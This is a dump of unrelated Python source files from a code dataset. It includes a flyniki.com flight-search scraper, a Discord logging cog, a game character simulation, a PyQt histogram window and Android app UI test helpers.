search results\n self._print_flights(search_reply)\n\n @staticmethod\n def _check_iata_code(iata_code):\n \"\"\"Check the given IATA-code\n\n If it's valid, return True. If not, raise ValueError.\n Warning: this function doesn't guarantee that the given IATA-code exists,\n it just checks its format.\"\"\"\n\n # 1. Check for the letter count\n if len(iata_code) != 3:\n raise ValueError('IATA-code must be exactly 3 characters long')\n\n # 2. Check that only english 26 letters are used\n # 3. Check that all letters are in upper case\n if re.match(\"^[A-Z]*$\", iata_code) is None:\n raise ValueError('IATA-code must contain only A-Z letters in the upper case')\n\n return True\n\n def _request_airports(self):\n \"\"\"Make an HTTP request to the website and return lists of airports\"\"\"\n\n req_departures = self.req_ses.get(\n 'http://www.'+self.domain_name+'/en/site/json/suggestAirport.php'\n '?searchfor=departures'\n '&searchflightid=0'\n '&departures%5B%5D='\n '&destinations%5B%5D=City%2C+airport'\n '&suggestsource%5B0%5D=activeairports'\n '&withcountries=0'\n '&withoutroutings=0'\n '&promotion%5Bid%5D='\n '&promotion%5Btype%5D='\n '&get_full_suggest_list=false'\n '&routesource%5B0%5D=airberlin'\n '&routesource%5B1%5D=partner'\n )\n req_destinations = self.req_ses.get(\n 'http://www.' + self.domain_name + '/en/site/json/suggestAirport.php'\n '?searchfor=destinations'\n '&searchflightid=0'\n '&departures%5B%5D=City%2C+airport'\n '&destinations%5B%5D='\n '&suggestsource%5B0%5D=activeairports'\n '&withcountries=0'\n '&withoutroutings=0'\n '&promotion%5Bid%5D='\n '&promotion%5Btype%5D='\n '&get_full_suggest_list=false'\n '&routesource%5B0%5D=airberlin'\n '&routesource%5B1%5D=partner'\n )\n # warning: these requests don't get all known airports. It seems that\n # flyniki.com doesn't work with some of them\n # or there is no planned flights for the remaining airports\n\n try:\n airports = {}\n # Please note: these lists are different in about 20 airports,\n # but they have a lot of common\n airports['departures'] = tuple(req_departures.json()['suggestList'])\n airports['destinations'] = tuple(req_destinations.json()['suggestList'])\n except (json.decoder.JSONDecodeError, IndexError):\n raise RuntimeError('Bad data format from the website')\n\n return airports\n\n def _iata_to_city_name(self, iata_code, airport_type):\n\n # Request the airport lists if we don't have them yet\n if self.airports is None:\n self.airports = self._request_airports()\n\n # Get a list for the requested direction\n if airport_type == 'departure':\n airports = self.airports['departures']\n elif airport_type == 'destination':\n airports = self.airports['destinations']\n else:\n raise ValueError('Wrong airport type is supplied to the function')\n\n # Perform search\n iata_match = list(filter(lambda x: x['code'] == iata_code, airports))\n found_count = len(iata_match)\n if found_count == 0:\n raise IATANotFoundError(\n 'The requested IATA-code \\''+ iata_code +'\\' was not found on ' + self.domain_name\n )\n elif found_count == 1:\n ret = iata_match[0]['name']\n return ret\n else:\n raise RuntimeError(\n self.domain_name + ' provided at least two airports with the same IATA-code'\n )\n\n def _request_flights(self, from_city, to_city, outbound_date, return_date):\n\n if self.vacancy_url is None:\n # Get a 'sid' parameter.\n # If we try to ask the website for a search without this parameter,\n # it fails due to some 'security reasons'.\n # So, we do a request, then it sends a Location header with a new 'sid' parameter\n req = self.req_ses.get(\n 'http://www.'+self.domain_name+'/en/booking/flight/vacancy.php',\n allow_redirects=False\n )\n self.vacancy_url = \"http://www.\" + self.domain_name + req.headers['Location']\n\n if return_date is None:\n oneway_search = True\n return_date = ''\n oneway = '1'\n else:\n oneway_search = False\n oneway = ''\n\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n\n post_data = ('_ajax[templates][]=main'\n '&_ajax[templates][]=priceoverview'\n '&_ajax[templates][]=infos'\n '&_ajax[templates][]=flightinfo'\n '&_ajax[requestParams][departure]='+from_city+\n '&_ajax[requestParams][destination]='+to_city+\n '&_ajax[requestParams][returnDeparture]='\n '&_ajax[requestParams][returnDestination]='\n '&_ajax[requestParams][outboundDate]='+outbound_date+\n '&_ajax[requestParams][returnDate]='+return_date+\n '&_ajax[requestParams][adultCount]=1'\n '&_ajax[requestParams][childCount]=0'\n '&_ajax[requestParams][infantCount]=0'\n '&_ajax[requestParams][openDateOverview]='\n '&_ajax[requestParams][oneway]='+oneway\n )\n # This conversion is not only for [] symbols.\n # Some cities contain some non-latin symbols that are needed to be percent-encoded\n post_data = urllib.parse.quote(post_data, safe='=&_+')\n\n req = self.req_ses.post(self.vacancy_url, data=post_data, headers=headers)\n\n got_data = req.json()\n\n if 'error' in got_data:\n error_text = self._parse_a_website_error(got_data['error'])\n if 'No connections found for the entered data.' in error_text:\n # Nothing's bad. We just have an empty result\n found_flights = {}\n else:\n raise SearchError('The website reported the following error: ' + error_text)\n else:\n main_html = got_data['templates']['main']\n found_flights = self._parse_html_flight_tables(main_html, oneway_search)\n\n return found_flights\n\n @staticmethod\n def _parse_a_website_error(error_html):\n parser = lxml.etree.HTMLParser(recover=True)\n html_etree = lxml.etree.parse(io.StringIO(\"\" + error_html + \"\"), parser)\n error_text = html_etree.xpath('/html/body/div/div/p/text()')\n try:\n error_text = error_text[0]\n except IndexError:\n error_text = 'Unknown website error'\n return error_text\n\n @classmethod\n def _parse_html_flight_tables(cls, raw_html, oneway_flights):\n result = {}\n\n # Yes, the site's reply has broken tags (like ).\n # So, we need to use a recover mode\n parser = lxml.etree.HTMLParser(recover=True)\n html_etree = lxml.etree.parse(io.StringIO(\"\" + raw_html + \"\"), parser)\n\n check_for_results = html_etree.xpath('''\n //table[@class='flighttable']\n ''')\n if len(list(check_for_results)) < 1:\n # Nothing's found or an error occurred\n return result\n\n html_flighttables = html_etree.xpath('''\n /html/body\n /div[@id='vacancy_flighttable']\n /div[@class='wrapper']\n /div[@id='flighttables']\n ''')[0]\n\n html_outbound_table = html_flighttables.xpath('''\n div[@class=\\'outbound block\\']\n /div[@class='tablebackground']\n /table[@class='flighttable']\n ''')[0]\n\n html_outbound_table_title = html_flighttables.xpath('''\n div[@class=\\'outbound block\\']\n /div[@class='row']\n /div[@class='flight-data-date']\n /div[@class='outboundicon']\n ''')[0]\n\n result['outbound_flights_details'] = cls._parse_flight_table_details(\n html_outbound_table_title\n )\n result['outbound_flights'] = cls._parse_flight_table(html_outbound_table)\n\n if oneway_flights is False:\n html_return_table = html_flighttables.xpath('''\n div[@class=\\'return block\\']\n /div[@class='tablebackground']\n /table[@class='flighttable']\n ''')[0]\n\n html_return_table_title = html_flighttables.xpath('''\n div[@class=\\'return block\\']\n /div[@class='row']\n /div[@class='flight-data-date']\n /div[@class='returnicon']\n ''')[0]\n\n result['return_flights_details'] = cls._parse_flight_table_details(\n html_return_table_title\n )\n result['return_flights'] = cls._parse_flight_table(html_return_table)\n\n return result\n\n @classmethod\n def _parse_flight_table(cls, table_element):\n result = {}\n result['flights'] = []\n\n fare_types = cls._parse_fare_types(table_element)\n\n # Extract the flights from rows\n html_rows = table_element.xpath('''\n tbody/tr[@class='flightrow selected'] | tbody/tr[@class='flightrow']\n ''')\n for row in html_rows:\n cols = row.xpath('td')\n row_result = {}\n\n # Extract the start time\n tmp = cols[1].xpath('span/time[1]/text()')[0]\n tmp = tmp.split(':')\n row_result['start_time'] = datetime.time(int(tmp[0]), int(tmp[1]))\n\n # Extract the end time\n tmp = cols[1].xpath('span/time[2]/text()')[0]\n tmp = tmp.split(':')\n row_result['end_time'] = datetime.time(int(tmp[0]), int(tmp[1]))\n\n # Extract the end time days\n days_strong = list(cols[1].xpath('span/strong[1]/text()'))\n if len(days_strong) > 0:\n row_result['end_time_days'] = int(days_strong[0][1:])\n else:\n row_result['end_time_days'] = 0\n\n # Extract the duration\n tmp = cols[3].xpath('span[1]/text()')[0].strip()\n tmp = tmp.split('h')\n tmp_hours = int(tmp[0].strip())\n tmp = tmp[1].split('min')\n tmp_mins = int(tmp[0].strip())\n row_result['duration'] = datetime.timedelta(hours=tmp_hours, minutes=tmp_mins)\n\n # Extract the prices\n row_result['prices'] = cls._parse_prices(fare_types, cols)\n\n result['flights'].append(row_result)\n return result\n\n @staticmethod\n def _parse_prices(fare_types, cols):\n result = []\n for fare_type in fare_types:\n price_row = {}\n if len(cols[fare_type['column_no']].xpath('span[@class=\"notbookable\"]')) == 0:\n price_row['name'] = fare_type['name']\n price_row['currency'] = fare_type['currency']\n\n # These prices are really complicated.\n # The website usually sends two equal prices: 'lowest' and 'current'.\n # Some script on this page hides the 'lowest' one.\n # The situation is easy, we should only use the 'current' value.\n # But... sometimes there is no a 'current' value.\n # In this case script shows the 'lowest' one.\n # The solution is pretty simple: use 'lowest' in absence of 'current'.\n # But rarely, the website sends both these prices,\n # but the 'lowest' one is a bit smaller than the 'current'.\n # In this case script shows the 'current' one.\n # This code do the same things, but it also ensures that 'lowest' <= 'current'.\n\n lowest_tmp = cols[fare_type['column_no']].xpath(\n 'label[1]/div[@class=\"lowest\"]/span[1]/text()'\n )\n current_tmp = price_row['current'] = cols[fare_type['column_no']].xpath(\n 'label[1]/div[@class=\"current\"]/span[1]/text()'\n )\n\n if len(lowest_tmp) > 0:\n lowest_tmp = lowest_tmp[0]\n else:\n raise RuntimeError('The website didn\\'t send the \\'lowest\\' price value')\n\n if len(current_tmp) > 0:\n current_tmp = current_tmp[0]\n else:\n current_tmp = None\n\n if lowest_tmp is None and current_tmp is None:\n raise RuntimeError(\n 'The website didn\\'t send both the \\'lowest\\' and \\'current\\' price values'\n )\n elif lowest_tmp is not None and current_tmp is None:\n price_row['value'] = lowest_tmp\n elif lowest_tmp is not None and current_tmp is not None:\n price_row['value'] = current_tmp\n if float(lowest_tmp.replace(',', '')) > float(current_tmp.replace(',', '')):\n raise RuntimeError('The website sent wrong prices')\n else:\n raise RuntimeError('Unexpected condition')\n\n result.append(price_row)\n\n return result\n\n @staticmethod\n def _parse_fare_types(table_element):\n # Extract the fare types and currency symbols from the table's head\n # This code finds all given fare types regardless of their order and count\n fare_types_cols_offset = int(table_element.xpath('thead/tr[1]/td[1]/@colspan')[0])\n fare_types = []\n fare_types_columns = table_element.xpath('thead/tr[1]/td')\n cnt = fare_types_cols_offset\n for column in fare_types_columns[1:]: # the first column is not related to the fare types\n fare_type = {}\n\n # Extract name\n fare_type['name'] = column.xpath('div[1]/label/p/text()')[0]\n if len(fare_type['name']) == 0:\n raise RuntimeError('Wrong table head format')\n\n # Extract currency sign\n fare_type['currency'] = table_element.xpath(\n 'thead/tr[2]/th[$col]/text()',\n col=cnt\n )[0].strip()\n if len(fare_type['currency']) == 0:\n raise RuntimeError('Wrong table head format')\n\n fare_type['column_no'] = cnt\n fare_types.append(fare_type)\n cnt += 1\n return fare_types\n\n @staticmethod\n def _parse_flight_table_details(html_element):\n result = {}\n\n # Parse direction\n title = html_element.xpath('h2/text()')[0]\n # title example: ' outbound flight '\n title = title.strip().split(' ')\n if title[0] == 'outbound':\n result['direction'] = 'outbound'\n elif title[0] == 'return':\n result['direction'] = 'return'\n else:\n raise RuntimeError('Can\\'t parse flight direction from the table\\'s title')\n\n # Parse details\n details = html_element.xpath('div[@class=\\'vacancy_route\\']/text()')[0]\n # details string example: 'Berlin (BER) – London (LON), Thursday, 27/10/16'\n parsed_data = parse.parse('{0} ({1}) – {2} ({3}),  {4}, {5}', details.strip())\n result['city_from'] = parsed_data[0]\n result['iata_from'] = parsed_data[1]\n result['city_to'] = parsed_data[2]\n result['iata_to'] = parsed_data[3]\n result['date'] = datetime.datetime.strptime(parsed_data[5], '%d/%m/%y').date()\n\n return result\n\n @staticmethod\n def _verify_search_results(search_reply, from_iata, to_iata, outbound_date, return_date=None):\n result = True\n\n if len(search_reply) == 0:\n # We just have no results. It's OK.\n return True\n\n if search_reply['outbound_flights_details']['direction'] != 'outbound':\n result = False\n if search_reply['outbound_flights_details']['iata_from'] != from_iata:\n result = False\n if search_reply['outbound_flights_details']['iata_to'] != to_iata:\n result = False\n if search_reply['outbound_flights_details']['date'] != outbound_date:\n result = False\n\n if return_date is None:\n if 'return_flight_details' in search_reply:\n # we were performing a one-way search and should not have any return flights\n result = False\n else:\n if search_reply['return_flights_details']['direction'] != 'return':\n result = False\n if search_reply['return_flights_details']['iata_from'] != to_iata:\n result = False\n if search_reply['return_flights_details']['iata_to'] != from_iata:\n result = False\n if search_reply['return_flights_details']['date'] != return_date:\n result = False\n\n return result\n\n @staticmethod\n def _print_flights(flights):\n for direction in (\n {'key': 'outbound_flights', 'name': 'Outbound flight'},\n {'key': 'return_flights', 'name': 'Return flight'}\n ):\n if direction['key'] in flights:\n for flight in flights[direction['key']]['flights']:\n print('{0}:'.format(direction['name']))\n\n # Print information about start and end times\n end_days_text = ''\n if flight['end_time_days'] == 1:\n end_days_text = ' +1 day'\n elif flight['end_time_days'] > 1:\n end_days_text = ' +' + str(flight['end_time_days']) + ' days'\n\n print('\\tStarts at {0} , ends at {1}{2}'.format(\n flight['start_time'].strftime('%H:%M'),\n flight['end_time'].strftime('%H:%M'),\n end_days_text\n ))\n\n # Print information about duration\n print('\\tDuration: {0}'.format(flight['duration']))\n\n # Print the information about prices\n print('\\tFare options:')\n for price in flight['prices']:\n print('\\t\\t{0:<17}: {1}{2}'.format(\n price['name'],\n price['currency'],\n price['value']\n ))\n","sub_path":"src/flights_search.py","file_name":"flights_search.py","file_ext":"py","file_size_in_byte":21949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"605105220","text":"import discord\nimport importlib\nimport modules.logging\nfrom discord.ext import commands\n\n\nclass LogCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.active = True\n modules.logging.init(self)\n\n def unload(self):\n importlib.reload(modules.logging)\n\n @commands.command(aliases=[\"log\", \"turn_on\", \"log_on\"])\n @commands.is_owner()\n async def toggle(self, ctx):\n self.active = True\n await ctx.send(\"Logging on\")\n\n @commands.command(aliases=[\"nolog\", \"turn_off\", \"log_off\"])\n @commands.is_owner()\n async def untoggle(self, ctx):\n self.active = False\n await ctx.send(\"Logging off\")\n\n async def log(self, log_type, message, datetime):\n if not self.active:\n return\n\n log_channel_id = 586519122037178380#584134598087278632\n log_channel = self.bot.get_channel(log_channel_id)\n content = None\n\n if log_type is modules.logging.LogType.ERROR:\n title = \"ERROR\"\n elif log_type is modules.logging.LogType.SUCCESS:\n title = \"SUCCESS\"\n elif log_type is modules.logging.LogType.URGENT:\n title = \"URGENT\"\n content = \"<@&583265861201297411>\"\n else:\n title = \"EVENT\"\n\n embed = discord.Embed(description=message, color=log_type.value, timestamp=datetime)\n embed.set_author(name=title)\n await log_channel.send(content, embed=embed)\n \n\n\n\ndef setup(bot):\n bot.add_cog(LogCog(bot))\n\n","sub_path":"cogs/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"252802159","text":"def sum(*args):\n \"\"\"计算n个数的和\"\"\"\n sum = 0\n for i in args:\n sum += i\n return sum\n\n\ndef multiply(*args):\n \"\"\"计算n个数相乘\"\"\"\n result = args[0]\n for i in args[1:]:\n result *= i\n return result\n\n\nif __name__ == \"__main__\":\n\n print(\"1+2+..+10的和是:\", sum(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))\n print(\"1*2*..*10的结果是:\", multiply(1, 2, 3, 4, 5, 6, 7, 8, 9, 10))\n","sub_path":"pers/cyj/day10/mudule/calc/calculator.py","file_name":"calculator.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"236364779","text":"from core.unit import Char\nfrom core.action import Action, Ability\nfrom core.scaling import ratio_type\nfrom core.read_data import buff_dict\nfrom core.artifact import Artifact\nimport copy\n\n\nclass Ningguang(Char):\n def __init__(self, level, constellation, weapon, weapon_rank, artifact, talent_levels):\n super().__init__(\"Ningguang\", level, constellation, weapon, weapon_rank, artifact, talent_levels)\n self.jade_stacks = 0\n self.jade_wall = False\n\n def ningguang_normal(self, _, __, ___):\n if self.jade_stacks < 3:\n self.jade_stacks += 1\n\n def ningguang_charged(self, _, sim, action):\n if self.jade_stacks > 0:\n jade_proc = JadeStar(self, self.jade_stacks)\n jade_proc.add_to_damage_queue(sim)\n self.jade_stacks = 0\n\n def ningguang_a2(self, _, __):\n if self.jade_stacks > 0:\n self.live_charged_stamina_cost = [0]\n\n def ningguang_e(self, _, sim, __):\n self.jade_wall = True\n\n for unit in sim.units:\n unit.triggerable_buffs[\"Ningguang_A4_Trigger\"] = copy.copy(buff_dict[\"Ningguang_A4_Trigger\"])\n unit.triggerable_buffs[\"Ningguang_A4_Trigger\"].time_remaining = 30\n unit.triggerable_buffs[\"Ningguang_A4_Trigger\"].source = self\n\n def ningguang_a4_trigger(self, unit_obj, sim, __):\n if unit_obj == sim.chosen_unit:\n unit_obj.active_buffs[\"Ningguang_A4_Buff\"] = copy.copy(buff_dict[\"Ningguang_A4_Buff\"])\n unit_obj.active_buffs[\"Ningguang_A4_Buff\"].source = self\n\n @staticmethod\n def ningguang_a4_buff(unit_obj, _):\n unit_obj.live_geo_dmg += 0.1\n\n def ningguang_q(self, _, sim, __):\n if self.jade_wall:\n\n self.jade_wall = False\n\n for unit in sim.units:\n del unit.triggerable_buffs[\"Ningguang_A4_Trigger\"]\n\n jade_stars_burst = Ability(self, \"burst\")\n jade_stars_burst.add_to_damage_queue(sim)\n\n if self.constellation >= 2:\n self.live_skill_cd = 0\n\n if self.constellation >= 6:\n self.jade_stacks = 7\n\n\nclass JadeStar(Action):\n def __init__(self, unit_obj, jade_stacks):\n super().__init__(unit_obj)\n self.action_type = \"damage\"\n self.ticks = jade_stacks\n self.tick_times = [0.25] * jade_stacks\n self.tick_damage = [0.496] * jade_stacks\n self.tick_scaling = [ratio_type(unit_obj, \"charged\")[unit_obj.normal_level]] * jade_stacks\n self.tick_types = [\"charged\"] * jade_stacks\n self.tick_units = [0] * jade_stacks\n self.tick_element = [\"Geo\"] * jade_stacks\n self.particles = 0\n self.tick_used = [\"no\"] * jade_stacks\n\n\nNingguangArtifact = Artifact(\"Archaic Petra\", \"pct_atk\", \"geo_dmg\", \"crit_rate\", 30)\n\nNingguangF2P = Ningguang(90, 0, \"Mappa Marre\", 1, NingguangArtifact, [6, 6, 6])\n\n\ndef main():\n print(NingguangTest.live_base_atk)\n print(NingguangTest.static_buffs)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"characters/Ningguang.py","file_name":"Ningguang.py","file_ext":"py","file_size_in_byte":2995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"267294964","text":"from . import *\nfrom telethon import events\n\nchat = 1202167338\n\n@asst.on(events.NewMessage(pattern=\"\\\\/search@Siddharth_Otaku_bot ?(.*)\"))\nasync def _(e):\n key = e.pattern_match.group(1)\n txt = \"\"\n async for x in bot.iter_messages(chat, search=key, reverse=True):\n txt += f\"https://t.me/animax_industry/{x.id}\\n\"\n if txt:\n await e.reply(txt, link_preview=False,)\n","sub_path":"oceansearch.py","file_name":"oceansearch.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"377844002","text":"from PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtGui import QFont, QDoubleValidator\n\nimport numpy as np\n\nfrom matplotlibcanvases import SingleMplCanvas\n\nclass WindowHistogram2DFrequency(QtWidgets.QWidget):\n def __init__(self) -> None:\n super().__init__()\n\n self.setWindowTitle(\"Quick Graphing - 2D Frequency Histogram\")\n\n self.data_x = []\n self.data_y = []\n\n font_times_12 = QFont(\"Times New Roman\", 12)\n font_times_14 = QFont(\"Times New Roman\", 14)\n font_times_16 = QFont(\"Times New Roman\", 16)\n font_times_16_underline = QFont(\"Times New Roman\", 16)\n font_times_16_underline.setUnderline(True)\n\n layout_main = QtWidgets.QVBoxLayout(self)\n\n layout_top = QtWidgets.QHBoxLayout()\n\n layout_plot_titles = QtWidgets.QVBoxLayout()\n\n label_plot_title = QtWidgets.QLabel()\n label_plot_title.setText(\"Title:\")\n label_plot_title.setFont(font_times_14)\n\n label_plot_xlabel = QtWidgets.QLabel()\n label_plot_xlabel.setText(\"x-axis Label:\")\n label_plot_xlabel.setFont(font_times_14)\n\n label_plot_ylabel = QtWidgets.QLabel()\n label_plot_ylabel.setText(\"y-axis Label:\")\n label_plot_ylabel.setFont(font_times_14)\n\n layout_plot_titles.addWidget(label_plot_title)\n layout_plot_titles.addWidget(label_plot_xlabel)\n layout_plot_titles.addWidget(label_plot_ylabel)\n\n layout_plot_values = QtWidgets.QVBoxLayout()\n\n self.line_edit_plot_title = QtWidgets.QLineEdit()\n self.line_edit_plot_title.setText(\"General Histogram\")\n self.line_edit_plot_title.setFont(font_times_14)\n self.line_edit_plot_title.editingFinished.connect(self.on_finished_editing_line_edit_plot_title)\n\n self.line_edit_plot_xlabel = QtWidgets.QLineEdit()\n self.line_edit_plot_xlabel.setText(\"x-values\")\n self.line_edit_plot_xlabel.setFont(font_times_14)\n self.line_edit_plot_xlabel.editingFinished.connect(self.on_finished_editing_line_edit_plot_xlabel)\n\n self.line_edit_plot_ylabel = QtWidgets.QLineEdit()\n self.line_edit_plot_ylabel.setText(\"y-values\")\n self.line_edit_plot_ylabel.setFont(font_times_14)\n self.line_edit_plot_ylabel.editingFinished.connect(self.on_finished_editing_line_edit_plot_ylabel)\n\n layout_plot_values.addWidget(self.line_edit_plot_title)\n layout_plot_values.addWidget(self.line_edit_plot_xlabel)\n layout_plot_values.addWidget(self.line_edit_plot_ylabel)\n\n layout_top.addLayout(layout_plot_titles)\n layout_top.addLayout(layout_plot_values)\n\n layout_bottom = QtWidgets.QHBoxLayout()\n\n self.canvas_plot = SingleMplCanvas(self, width=5, height=5, dpi=100)\n\n layout_right_side_bar = QtWidgets.QVBoxLayout()\n\n label_points_title = QtWidgets.QLabel()\n label_points_title.setText(\"Points\")\n label_points_title.setFont(font_times_16_underline)\n\n self.list_widget_points = QtWidgets.QListWidget()\n self.list_widget_points.setSelectionMode(QtWidgets.QAbstractItemView.MultiSelection)\n self.list_widget_points.setFont(font_times_12)\n\n button_remove_point = QtWidgets.QPushButton()\n button_remove_point.setText(\"Remove Selected Points\")\n button_remove_point.setFont(font_times_14)\n button_remove_point.clicked.connect(self.on_click_remove_point)\n\n layout_line_edit_x = QtWidgets.QHBoxLayout()\n\n label_line_edit_x = QtWidgets.QLabel()\n label_line_edit_x.setText(\"x:\")\n label_line_edit_x.setFont(font_times_16)\n\n self.line_edit_x = QtWidgets.QLineEdit()\n self.line_edit_x.setValidator(QDoubleValidator())\n self.line_edit_x.setFont(font_times_16)\n\n layout_line_edit_x.addWidget(label_line_edit_x)\n layout_line_edit_x.addWidget(self.line_edit_x)\n \n layout_line_edit_y = QtWidgets.QHBoxLayout()\n\n label_line_edit_y = QtWidgets.QLabel()\n label_line_edit_y.setText(\"y:\")\n label_line_edit_y.setFont(font_times_16)\n\n self.line_edit_y = QtWidgets.QLineEdit()\n self.line_edit_y.setValidator(QDoubleValidator())\n self.line_edit_y.setFont(font_times_16)\n\n button_add_point = QtWidgets.QPushButton()\n button_add_point.setText(\"Add Point\")\n button_add_point.setFont(font_times_14)\n button_add_point.clicked.connect(self.on_click_button_add_point)\n\n layout_line_edit_y.addWidget(label_line_edit_y)\n layout_line_edit_y.addWidget(self.line_edit_y)\n\n layout_right_side_bar.addWidget(label_points_title)\n layout_right_side_bar.addWidget(self.list_widget_points)\n layout_right_side_bar.addWidget(button_remove_point)\n layout_right_side_bar.addLayout(layout_line_edit_x)\n layout_right_side_bar.addLayout(layout_line_edit_y)\n layout_right_side_bar.addWidget(button_add_point)\n\n layout_bottom.addWidget(self.canvas_plot, 5)\n layout_bottom.addLayout(layout_right_side_bar, 1)\n\n layout_main.addLayout(layout_top, 1)\n layout_main.addLayout(layout_bottom, 5)\n\n self.update_plots()\n self.update_list()\n\n def update_plots(self) -> None:\n self.canvas_plot.axes.clear()\n\n self.canvas_plot.axes.set_title(self.line_edit_plot_title.text())\n self.canvas_plot.axes.set_xlabel(self.line_edit_plot_xlabel.text())\n self.canvas_plot.axes.set_ylabel(self.line_edit_plot_ylabel.text())\n\n self.canvas_plot.axes.hist2d(self.data_x, self.data_y)\n \n self.canvas_plot.draw()\n \n def update_list(self) -> None:\n self.list_widget_points.clear()\n for index, item in enumerate(np.column_stack((self.data_x, self.data_y))):\n self.list_widget_points.insertItem(index, np.array2string(item, separator=\",\"))\n\n def on_click_remove_point(self) -> None:\n indices_to_delete = []\n for item in self.list_widget_points.selectedIndexes():\n indices_to_delete.append(item.row())\n indices_to_delete.sort(reverse=True)\n for index in indices_to_delete:\n del self.data_x[index]\n del self.data_y[index]\n\n self.update_plots()\n self.update_list()\n\n def on_click_button_add_point(self) -> None:\n self.data_x.append(float(self.line_edit_x.text()))\n self.data_y.append(float(self.line_edit_y.text()))\n\n self.update_plots()\n self.update_list()\n\n def on_finished_editing_line_edit_plot_title(self) -> None:\n self.update_plots()\n\n def on_finished_editing_line_edit_plot_xlabel(self) -> None:\n self.update_plots()\n\n def on_finished_editing_line_edit_plot_ylabel(self) -> None:\n self.update_plots()\n","sub_path":"windowsimpleplots/window_histogram_2d_frequency.py","file_name":"window_histogram_2d_frequency.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"266640056","text":"from .app import FastApiApp, FlaskApp\nimport sys\n\n\nclass BaseComand:\n def __init__(self, app, folder_name, db_driver, db_name, testdb_name, git_repo):\n self.app = app\n self.folder_name = folder_name\n self.db_driver = db_driver\n self.db_name = db_name\n self.testdb_name = testdb_name\n self.git_repo = git_repo\n\n def start(self):\n if self.app == \"fastapi\":\n\n app = FastApiApp(self.app, self.folder_name, self.db_driver, self.db_name,self.git_repo)\n app.start()\n\n elif self.app == \"flask\":\n\n app = FlaskApp(self.app, self.folder_name, self.db_driver, self.db_name, self.testdb_name, self.git_repo)\n app.start()\n","sub_path":"takeaway/controllers/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"222848324","text":"# -*- coding:UTF-8 -*-\n'''\nCreated on 2016-8-15\n\n@author: N-254\n'''\nfrom Mobile import MobileUtil\nfrom COMMON import Log\nfrom CONFIG.Define import LogLevel\nfrom Mobile.Define.Clue import OthersObjectDef\nimport copy\n\n'''\n @功能:区域选择\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n'''\ndef area_select():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/left_text']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"区域选择点击成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"区域选择点击失败\")\n return False\n \n'''\n @功能:收件箱点击\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n'''\ndef click_unread_message():\n xpath = \"//android.widget.LinearLayout[@resource-id='com.tianque.linkage:id/rl_right']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"未读消息点击成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"未读消息点击失败\")\n return False\n \n'''\n @功能:点击轮播信息\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n'''\ndef click_lunbo_info(text=None):\n xpath = \"//android.widget.TextView[@text='%s']\" % text\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击轮播内容成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击轮播内容失败\")\n return False\n \n'''\n @功能:点击爆料广场\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_baoliao_square():\n xpath = \"//android.widget.TextView[@text='爆料广场']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击爆料广场成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击爆料广场失败\")\n return False\n \n'''\n @功能:获取爆料统计\n @para: \n @return: 返回爆料统计对象,包含今日新增数量,本周办结数量,全省本周办结数量\n @ hongzenghui 2016-8-15\n''' \ndef get_baoliao_count():\n xpath1 = \"//android.widget.TextView[@text='今日新增']/following-sibling::android.widget.TextView[1]\"\n xpath2 = \"//android.widget.TextView[@text='本周办结']/following-sibling::android.widget.TextView[1]\"\n xpath3 = \"//android.widget.TextView[@text='全省本周办结']/following-sibling::android.widget.TextView[1]\"\n baoliaoCountObject = copy.deepcopy(OthersObjectDef.baoliaoCount) \n baoliaoCountObject['todayAdd'] = MobileUtil.find_element_by_xpath(xpath1).text\n baoliaoCountObject['weekComplete'] = MobileUtil.find_element_by_xpath(xpath2).text\n baoliaoCountObject['allProviceWeekComplete'] = MobileUtil.find_element_by_xpath(xpath3).text\n Log.LogOutput(LogLevel.DEBUG, message=\"今日新增统计:%s,本周办结统计:%s,全省本周办结统计:%s\" % (baoliaoCountObject['todayAdd'],baoliaoCountObject['weekComplete'],baoliaoCountObject['allProviceWeekComplete']))\n return baoliaoCountObject\n\n'''\n @功能:点击说说\n @para: \n @return: 点击成功,返回True;否则返回False\n @ hongzenghui 2016-8-15\n''' \ndef click_shuoshuo():\n xpath = \"//android.widget.TextView[@resource-id='com.tianque.linkage:id/module_topic']\"\n if MobileUtil.click_element_by_xpath(xpath) is True:\n Log.LogOutput(LogLevel.DEBUG, message=\"点击说说成功\")\n return True\n else:\n Log.LogOutput(LogLevel.ERROR, message=\"点击说说失败\")\n return False\n \n'''\n @功能:点击平安宣传\n @para: \n @return: 点击成功,返回True;否则返回False\n @ 